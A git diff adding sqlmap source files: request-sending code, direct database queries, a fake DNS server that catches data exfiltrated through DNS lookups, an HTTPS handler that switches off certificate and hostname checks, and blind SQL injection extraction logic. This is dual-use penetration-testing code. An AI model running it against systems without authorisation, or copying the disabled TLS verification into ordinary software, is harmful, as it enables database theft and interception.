delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER + variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals(), "cookie": cookie} + originals = {} + + if not get and PLACE.URI in conf.parameters: + query = _urllib.parse.urlsplit(uri).query or "" + else: + query = None + + for item in filterNone((get, post if not kb.postHint else None, query)): + for part in item.split(delimiter): + if '=' in part: + name, value = part.split('=', 1) + name = name.strip() + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus)) + variables[name] = value + + if post and kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + for name, value in (parseJson(post) or {}).items(): + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + variables[name] = value + + if cookie: + for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): + if '=' in part: + name, value = part.split('=', 1) + name = name.strip() + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + value = urldecode(value, convall=True) + variables[name] = value + + while True: + try: + compile(getBytes(re.sub(r"\s*;\s*", "\n", conf.evalCode)), "", "exec") + except SyntaxError as ex: + if ex.text: + original = replacement = getUnicode(ex.text.strip()) + + if '=' in original: + name, value = original.split('=', 1) + name = name.strip() + if safeVariableNaming(name) != name: + replacement = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), replacement) + else: + for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: + if safeVariableNaming(_) != _: + replacement = replacement.replace(_, safeVariableNaming(_)) + break + + if original == replacement: + conf.evalCode = conf.evalCode.replace(EVALCODE_ENCODED_PREFIX, "") + break + else: + conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement) + else: + break + else: + break + + originals.update(variables) + evaluateCode(conf.evalCode, variables) + + for variable in list(variables.keys()): + if unsafeVariableNaming(variable) != variable: + entry = variables[variable] + del variables[variable] + variables[unsafeVariableNaming(variable)] = entry + + uri = variables["uri"] + cookie = variables["cookie"] + + for name, entry in variables.items(): + if name != "__builtins__" and originals.get(name, "") != entry: + if isinstance(entry, (int, float, six.string_types, six.binary_type)): + found = False + entry = getUnicode(entry, UNICODE_ENCODING) + + if kb.postHint == POST_HINT.MULTIPART: + boundary = "--%s" % re.search(r"boundary=([^\s]+)", contentType).group(1) + if boundary: + parts = post.split(boundary) + match = re.search(r'\bname="%s"' % re.escape(name), post) + if not match and parts: + parts.insert(2, parts[1]) + parts[2] = re.sub(r'\bname="[^"]+".*', 'name="%s"' % re.escape(name), parts[2]) + for i in xrange(len(parts)): + part = parts[i] + if re.search(r'\bname="%s"' % re.escape(name), part): + match = re.search(r"(?s)\A.+?\r?\n\r?\n", part) + if match: + found = True + first = match.group(0) + second = part[len(first):] + second = re.sub(r"(?s).+?(\r?\n?\-*\Z)", r"%s\g<1>" % re.escape(entry), second) + parts[i] = "%s%s" % (first, second) + post = boundary.join(parts) + + elif kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""): + if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP): + if re.search(r"<%s\b" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + elif re.search(r"\b%s>" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + + elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + match = re.search(r"['\"]%s['\"]:" % re.escape(name), post) + if match: + quote = match.group(0)[0] + post = post.replace("\\%s" % quote, BOUNDARY_BACKSLASH_MARKER) + match = re.search(r"(%s%s%s:\s*)(\d+|%s[^%s]*%s)" % (quote, re.escape(name), quote, quote, quote, quote), post) + if match: + found = True + post = post.replace(match.group(0), "%s%s" % (match.group(1), entry if entry.isdigit() else "%s%s%s" % (match.group(0)[0], entry, match.group(0)[0]))) + post = post.replace(BOUNDARY_BACKSLASH_MARKER, "\\%s" % quote) + + regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, r"\g<1>\g<2>%s" % entry.replace('\\', r'\\'), post) + + regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + + if re.search(regex, (get or "")): + found = True + get = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), get) + + if re.search(regex, (query or "")): + found = True + uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), uri) + + regex = r"((\A|%s\s*)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) + if re.search(regex, (cookie or "")): + found = True + cookie = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), cookie) + + if not found: + if post is not None: + if kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + match = re.search(r"['\"]", post) + if match: + quote = match.group(0) + post = re.sub(r"\}\Z", "%s%s}" % (',' if re.search(r"\w", post) else "", "%s%s%s:%s" % (quote, name, quote, entry if entry.isdigit() else "%s%s%s" % (quote, entry, quote))), post) + else: + post += "%s%s=%s" % (delimiter, name, entry) + elif get is not None: + get += "%s%s=%s" % (delimiter, name, entry) + elif cookie is not None: + cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, entry) + + if not conf.skipUrlEncode: + get = urlencode(get, limit=True) + + if post is not None: + if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): + post = getattr(post, UNENCODED_ORIGINAL_VALUE) + elif postUrlEncode: + post = urlencode(post, spaceplus=kb.postSpaceToPlus) + + if timeBasedCompare and not conf.disableStats: + if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES: + clearConsoleLine() + + kb.responseTimes.setdefault(kb.responseTimeMode, []) + + if conf.tor: + warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " + warnMsg += "time-based injections because of inherent high latency time" + singleTimeWarnMessage(warnMsg) + + warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") + warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of") + dataToStdout(warnMsg) + + while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: + _ = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload + Connect.queryPage(value=_, content=True, raise404=False) + dataToStdout('.') + + dataToStdout(" (done)\n") + + elif not kb.testMode: + warnMsg = "it is very important to not stress the network connection " + warnMsg += "during usage of time-based payloads to prevent potential " + warnMsg += "disruptions " + singleTimeWarnMessage(warnMsg) + + if not kb.laggingChecked: + kb.laggingChecked = True + + deviation = stdev(kb.responseTimes[kb.responseTimeMode]) + + if deviation is not None and deviation > WARN_TIME_STDEV: + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE + + warnMsg = "considerable lagging has been detected " + warnMsg += "in connection response(s). Please use as high " + warnMsg += "value for option '--time-sec' as possible (e.g. " + warnMsg += "10 or more)" + logger.critical(warnMsg) + + if (conf.safeFreq or 0) > 0: + kb.queryCounter += 1 + if kb.queryCounter % conf.safeFreq == 0: + if conf.safeUrl: + Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) + elif kb.safeReq: + Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers) + + start = time.time() + + if kb.nullConnection and not content and not response and not timeBasedCompare: + noteResponseTime = False + + try: + pushValue(kb.pageCompress) + kb.pageCompress = False + + if kb.nullConnection == NULLCONNECTION.HEAD: + method = HTTPMETHOD.HEAD + elif kb.nullConnection == NULLCONNECTION.RANGE: + auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" + + _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) + + if headers: + try: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): + pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0]) + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): + pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) + except ValueError: + pass + finally: + kb.pageCompress = popValue() + + if pageLength is None: + try: + page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) + except MemoryError: + page, headers, code = None, None, None + warnMsg = "site returned insanely large response" + if kb.testMode: + warnMsg += " in testing phase. This is a common " + warnMsg += "behavior in custom WAF/IPS solutions" + singleTimeWarnMessage(warnMsg) + + if not ignoreSecondOrder: + if conf.secondUrl: + page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + elif kb.secondReq and IPS_WAF_CHECK_PAYLOAD not in _urllib.parse.unquote(value or ""): + def _(value): + if kb.customInjectionMark in (value or ""): + if payload is None: + value = value.replace(kb.customInjectionMark, "") + else: + try: + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value) + except re.error: + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), re.escape(payload), value) + return value + page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + + threadData.lastQueryDuration = calculateDeltaSeconds(start) + + kb.originalCode = code if kb.originalCode is None else kb.originalCode + kb.originalPage = page if kb.originalPage is None else kb.originalPage + + if kb.testMode: + kb.testQueryCount += 1 + + if timeBasedCompare: + return wasLastResponseDelayed() + elif noteResponseTime: + kb.responseTimes.setdefault(kb.responseTimeMode, []) + kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) + if len(kb.responseTimes[kb.responseTimeMode]) > MAX_TIME_RESPONSES: + kb.responseTimes[kb.responseTimeMode] = kb.responseTimes[kb.responseTimeMode][-MAX_TIME_RESPONSES // 2:] + + if not response and removeReflection: + page = removeReflectiveValues(page, payload) + + kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None + + message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I) + if message: + kb.permissionFlag = True + singleTimeWarnMessage("potential permission problems detected ('%s')" % message) + + headers = patchHeaders(headers) + + if content or response: + return page, headers, code + + if getRatioValue: + return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) + else: + return comparison(page, headers, code, getRatioValue, pageLength) + +def setHTTPHandlers(): # Cross-referenced function + raise NotImplementedError diff --git a/src/sqlmap-master/lib/request/direct.py b/src/sqlmap-master/lib/request/direct.py new file mode 100644 index 0000000..1c418da --- /dev/null +++ b/src/sqlmap-master/lib/request/direct.py @@ -0,0 +1,87 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re +import time + +from lib.core.agent import agent +from lib.core.common import Backend +from lib.core.common import calculateDeltaSeconds +from lib.core.common import extractExpectedValue +from lib.core.common import getCurrentThreadData +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.common import isListLike +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.dicts import SQL_STATEMENTS +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import DBMS +from lib.core.enums import EXPECTED +from lib.core.enums import TIMEOUT_STATE +from lib.core.settings import UNICODE_ENCODING +from lib.utils.safe2bin import safecharencode +from lib.utils.timeout import timeout + +def direct(query, content=True): + select = True + query = agent.payloadDirect(query) + query = agent.adjustLateValues(query) + threadData = getCurrentThreadData() + + if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper(): + query = "%s FROM DUAL" % query + + for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): + for sqlStatement in sqlStatements: + if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement": + select = False + break + + if select: + if re.search(r"(?i)\ASELECT ", query) is None: + query = "SELECT %s" % query + + if conf.binaryFields: + for field in conf.binaryFields: + field = field.strip() + if re.search(r"\b%s\b" % re.escape(field), query): + query = re.sub(r"\b%s\b" % re.escape(field), agent.hexConvertField(field), query) + + logger.log(CUSTOM_LOGGING.PAYLOAD, query) + + output = hashDBRetrieve(query, True, True) + start = time.time() + + if not select and re.search(r"(?i)\bEXEC ", query) is None: + timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) + elif not (output and ("%soutput" % conf.tablePrefix) not in query and ("%sfile" % conf.tablePrefix) not in query): + output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) + if state == TIMEOUT_STATE.NORMAL: + hashDBWrite(query, output, True) + elif state == TIMEOUT_STATE.TIMEOUT: + conf.dbmsConnector.close() + conf.dbmsConnector.connect() + elif output: + infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] + logger.info(infoMsg) + + threadData.lastQueryDuration = calculateDeltaSeconds(start) + + if not output: + return output + elif content: + if output and isListLike(output): + if len(output[0]) == 1: + output = [_[0] for _ in output] + + retVal = getUnicode(output, noneToNull=True) + return safecharencode(retVal) if kb.safeCharEncode else retVal + else: + return extractExpectedValue(output, EXPECTED.BOOL) diff --git a/src/sqlmap-master/lib/request/dns.py b/src/sqlmap-master/lib/request/dns.py new file mode 100644 index 0000000..70db51f --- /dev/null +++ b/src/sqlmap-master/lib/request/dns.py @@ -0,0 +1,184 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import binascii +import os +import re +import socket +import struct +import threading +import time + +class DNSQuery(object): + """ + >>> DNSQuery(b'|K\\x01 \\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x03www\\x06google\\x03com\\x00\\x00\\x01\\x00\\x01\\x00\\x00)\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\n\\x00\\x08O4|Np!\\x1d\\xb3')._query == b"www.google.com." + True + >>> DNSQuery(b'\\x00')._query == b"" + True + """ + + def __init__(self, raw): + self._raw = raw + self._query = b"" + + try: + type_ = (ord(raw[2:3]) >> 3) & 15 # Opcode bits + + if type_ == 0: # Standard query + i = 12 + j = ord(raw[i:i + 1]) + + while j != 0: + self._query += raw[i + 1:i + j + 1] + b'.' + i = i + j + 1 + j = ord(raw[i:i + 1]) + except TypeError: + pass + + def response(self, resolution): + """ + Crafts raw DNS resolution response packet + """ + + retVal = b"" + + if self._query: + retVal += self._raw[:2] # Transaction ID + retVal += b"\x85\x80" # Flags (Standard query response, No error) + retVal += self._raw[4:6] + self._raw[4:6] + b"\x00\x00\x00\x00" # Questions and Answers Counts + retVal += self._raw[12:(12 + self._raw[12:].find(b"\x00") + 5)] # Original Domain Name Query + retVal += b"\xc0\x0c" # Pointer to domain name + retVal += b"\x00\x01" # Type A + retVal += b"\x00\x01" # Class IN + retVal += b"\x00\x00\x00\x20" # TTL (32 seconds) + retVal += b"\x00\x04" # Data length + retVal += b"".join(struct.pack('B', int(_)) for _ in resolution.split('.')) # 4 bytes of IP + + return retVal + +class DNSServer(object): + """ + Used for making fake DNS resolution responses based on received + raw request + + Reference(s): + https://code.activestate.com/recipes/491264-mini-fake-dns-server/ + https://web.archive.org/web/20150418152405/https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py + """ + + def __init__(self): + self._check_localhost() + self._requests = [] + self._lock = threading.Lock() + + try: + self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM) + except AttributeError: + self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + + self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self._socket.bind(("", 53)) + self._running = False + self._initialized = False + + def _check_localhost(self): + response = b"" + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(("", 53)) + s.send(binascii.unhexlify("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000")) # A www.google.com + response = s.recv(512) + except: + pass + finally: + if response and b"google" in response: + raise socket.error("another DNS service already running on '0.0.0.0:53'") + + def pop(self, prefix=None, suffix=None): + """ + Returns received DNS resolution request (if any) that has given + prefix/suffix combination (e.g. prefix.<query result>.suffix.domain) + """ + + retVal = None + + if prefix and hasattr(prefix, "encode"): + prefix = prefix.encode() + + if suffix and hasattr(suffix, "encode"): + suffix = suffix.encode() + + with self._lock: + for _ in self._requests: + if prefix is None and suffix is None or re.search(b"%s\\..+\\.%s" % (prefix, suffix), _, re.I): + self._requests.remove(_) + retVal = _.decode() + break + + return retVal + + def run(self): + """ + Runs a DNSServer instance as a daemon thread (killed by program exit) + """ + + def _(): + try: + self._running = True + self._initialized = True + + while True: + data, addr = self._socket.recvfrom(1024) + _ = DNSQuery(data) + self._socket.sendto(_.response("127.0.0.1"), addr) + + with self._lock: + self._requests.append(_._query) + + except KeyboardInterrupt: + raise + + finally: + self._running = False + + thread = threading.Thread(target=_) + thread.daemon = True + thread.start() + +if __name__ == "__main__": + server = None + try: + server = DNSServer() + server.run() + + while not server._initialized: + time.sleep(0.1) + + while server._running: + while True: + _ = server.pop() + + if _ is None: + break + else: + print("[i] %s" % _) + + time.sleep(1) + + except socket.error as ex: + if 'Permission' in str(ex): + print("[x] Please run with sudo/Administrator privileges") + else: + raise + except KeyboardInterrupt: + os._exit(0) + finally: + if server: + server._running = False diff --git a/src/sqlmap-master/lib/request/httpshandler.py b/src/sqlmap-master/lib/request/httpshandler.py new file mode 100644 index 0000000..c3af58f --- /dev/null +++ b/src/sqlmap-master/lib/request/httpshandler.py @@ -0,0 +1,138 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re +import socket + +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.compat import LooseVersion +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from lib.core.settings import PYVERSION +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib + +ssl = None +try: + import ssl as _ssl + ssl = _ssl +except ImportError: + pass + +_protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLS_CLIENT", "PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")) +_lut = dict((getattr(ssl, _), _) for _ in dir(ssl) if _.startswith("PROTOCOL_")) +_contexts = {} + +class HTTPSConnection(_http_client.HTTPSConnection): + """ + Connection class that enables usage of newer SSL protocols. + + Reference: http://bugs.python.org/msg128686 + + NOTE: use https://check-tls.akamaized.net/ to check if (e.g.) TLS/SNI is working properly + """ + + def __init__(self, *args, **kwargs): + # NOTE: Dirty patch for https://bugs.python.org/issue38251 / https://github.com/sqlmapproject/sqlmap/issues/4158 + if hasattr(ssl, "_create_default_https_context"): + if None not in _contexts: + _contexts[None] = ssl._create_default_https_context() + kwargs["context"] = _contexts[None] + + self.retrying = False + + _http_client.HTTPSConnection.__init__(self, *args, **kwargs) + + def connect(self): + def create_sock(): + sock = socket.create_connection((self.host, self.port), self.timeout) + if getattr(self, "_tunnel_host", None): + self.sock = sock + self._tunnel() + return sock + + success = False + + # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext + # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni + if hasattr(ssl, "SSLContext"): + for protocol in (_ for _ in _protocols if _ >= ssl.PROTOCOL_TLSv1): + try: + sock = create_sock() + if protocol not in _contexts: + _contexts[protocol] = ssl.SSLContext(protocol) + + # Disable certificate and hostname validation enabled by default with PROTOCOL_TLS_CLIENT + _contexts[protocol].check_hostname = False + _contexts[protocol].verify_mode = ssl.CERT_NONE + + if getattr(self, "cert_file", None) and getattr(self, "key_file", None): + _contexts[protocol].load_cert_chain(certfile=self.cert_file, keyfile=self.key_file) + try: + # Reference(s): https://askubuntu.com/a/1263098 + # https://askubuntu.com/a/1250807 + _contexts[protocol].set_ciphers("DEFAULT@SECLEVEL=1") + except (ssl.SSLError, AttributeError): + pass + result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None) + if result: + success = True + self.sock = result + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, _http_client.BadStatusLine) as ex: + self._tunnel_host = None + logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex))) + + elif hasattr(ssl, "wrap_socket"): + for protocol in _protocols: + try: + sock = create_sock() + _ = ssl.wrap_socket(sock, keyfile=getattr(self, "key_file"), certfile=getattr(self, "cert_file"), ssl_version=protocol) + if _: + success = True + self.sock = _ + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, _http_client.BadStatusLine) as ex: + self._tunnel_host = None + logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex))) + + if not success: + errMsg = "can't establish SSL connection" + # Reference: https://docs.python.org/2/library/ssl.html + if LooseVersion(PYVERSION) < LooseVersion("2.7.9"): + errMsg += " (please retry with Python >= 2.7.9)" + + if kb.sslSuccess and not self.retrying: + self.retrying = True + + for _ in xrange(conf.retries): + try: + self.connect() + except SqlmapConnectionException: + pass + else: + return + + raise SqlmapConnectionException(errMsg) + else: + kb.sslSuccess = True + +class HTTPSHandler(_urllib.request.HTTPSHandler): + def https_open(self, req): + return self.do_open(HTTPSConnection if ssl else _http_client.HTTPSConnection, req) diff --git a/src/sqlmap-master/lib/request/inject.py b/src/sqlmap-master/lib/request/inject.py new file mode 100644 index 0000000..afaad5a --- /dev/null +++ b/src/sqlmap-master/lib/request/inject.py @@ -0,0 +1,566 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import re +import time + +from lib.core.agent import agent +from lib.core.bigarray import BigArray +from lib.core.common import applyFunctionRecursively +from lib.core.common import Backend +from lib.core.common import calculateDeltaSeconds +from lib.core.common import cleanQuery +from lib.core.common import expandAsteriskForColumns +from lib.core.common import extractExpectedValue +from lib.core.common import filterNone +from lib.core.common import getPublicTypeMembers +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.common import initTechnique +from lib.core.common import isDigit +from lib.core.common import isNoneValue +from lib.core.common import isNumPosStrValue +from lib.core.common import isTechniqueAvailable +from lib.core.common import parseUnionPage +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import setTechnique +from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.decorators import lockedmethod +from lib.core.decorators import stackedmethod +from lib.core.dicts import FROM_DUMMY_TABLE +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS +from lib.core.enums import EXPECTED +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapNotVulnerableException +from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS +from lib.core.settings import INFERENCE_MARKER +from lib.core.settings import MAX_TECHNIQUES_PER_VALUE +from lib.core.settings import SQL_SCALAR_REGEX +from lib.core.settings import UNICODE_ENCODING +from lib.core.threads import getCurrentThreadData +from lib.request.connect import Connect as Request +from lib.request.direct import direct +from lib.techniques.blind.inference import bisection +from lib.techniques.blind.inference import queryOutputLength +from lib.techniques.dns.test import dnsTest +from lib.techniques.dns.use import dnsUse +from lib.techniques.error.use import errorUse +from lib.techniques.union.use import unionUse +from thirdparty import six + +def _goDns(payload, expression): + value = None + + if conf.dnsDomain and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: + if kb.dnsTest is None: + dnsTest(payload) + + if kb.dnsTest: + value = dnsUse(payload, expression) + + return value + +def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None): + start = time.time() + value = None + count = 0 + + value = _goDns(payload, expression) + + if payload is None: + return None + + if value is not None: + return value + + timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + + if timeBasedCompare and conf.threads > 1 and kb.forceThreads is None: + msg = "multi-threading is considered unsafe in " + msg += "time-based data retrieval. Are you sure " + msg += "of your choice (breaking warranty) [y/N] " + + kb.forceThreads = readInput(msg, default='N', boolean=True) + + if not (timeBasedCompare and kb.dnsTest): + if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search(r"(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not kb.forceThreads): + + if field and re.search(r"\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CUBRID): + alias = randomStr(lowercase=True, seed=hash(expression)) + expression = "SELECT %s FROM (%s)" % (field if '.' not in field else re.sub(r".+\.", "%s." % alias, field), expression) # Note: MonetDB as a prime example + expression += " AS %s" % alias + else: + expression = "SELECT %s FROM (%s)" % (field, expression) + + if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields or Backend.getIdentifiedDbms() in (DBMS.RAIMA,): + nulledCastedField = agent.nullAndCastField(field) + injExpression = expression.replace(field, nulledCastedField, 1) + else: + injExpression = expression + length = queryOutputLength(injExpression, payload) + else: + length = None + + kb.inferenceMode = True + count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) + kb.inferenceMode = False + + if not kb.bruteMode: + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) + logger.debug(debugMsg) + + return value + +def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): + outputs = [] + origExpr = None + + for field in expressionFieldsList: + output = None + + if field.startswith("ROWNUM "): + continue + + if isinstance(num, int): + origExpr = expression + expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) + + if "ROWNUM" in expressionFieldsList: + expressionReplaced = expression + else: + expressionReplaced = expression.replace(expressionFields, field, 1) + + output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) + + if isinstance(num, int): + expression = origExpr + + outputs.append(output) + + return outputs + +def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): + """ + Retrieve the output of a SQL query characted by character taking + advantage of an blind SQL injection vulnerability on the affected + parameter through a bisection algorithm. + """ + + initTechnique(getTechnique()) + + query = agent.prefixQuery(getTechniqueData().vector) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + count = None + startLimit = 0 + stopLimit = None + outputs = BigArray() + + if not unpack: + return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) + + _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) + + rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) + if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): + expressionFieldsList = [expressionFields] + + if len(expressionFieldsList) > 1: + infoMsg = "the SQL query provided has more than one field. " + infoMsg += "sqlmap will now unpack it into distinct queries " + infoMsg += "to be able to retrieve the output even if we " + infoMsg += "are going blind" + logger.info(infoMsg) + + # If we have been here from SQL query/shell we have to check if + # the SQL query might return multiple entries and in such case + # forge the SQL limiting the query output one entry at a time + # 